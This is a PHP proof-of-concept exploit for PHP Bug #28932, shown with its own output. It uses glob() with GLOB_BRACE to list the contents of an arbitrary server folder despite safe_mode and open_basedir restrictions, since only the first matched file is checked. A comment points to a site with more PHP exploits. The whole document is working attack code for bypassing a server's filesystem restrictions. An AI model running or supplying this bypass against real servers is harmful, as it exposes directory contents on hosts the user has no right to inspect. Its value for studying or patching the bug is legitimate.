open_basedir: 1
safe_mode: 1
Array
(
[0] => globall.php
)
<?php
// /tmp/faketmp could be any folder at server -
// safe_mode and open_basedir-restriction does not apply;
// glob() only checks UID/location of first file matched
// PHP Bug #28932
// More examples of PHP exploits: http://stock.ter.dk/session.php
print "<pre>";
print "open_basedir: ".(bool)ini_get('open_basedir')."\n";
print "safe_mode: ".ini_get('safe_mode')."\n\n";
print_r(glob("{globall.php,/tmp/faketmp/*}",GLOB_BRACE));
print "</pre>";
print "<hr>";
show_source(__FILE__);
?>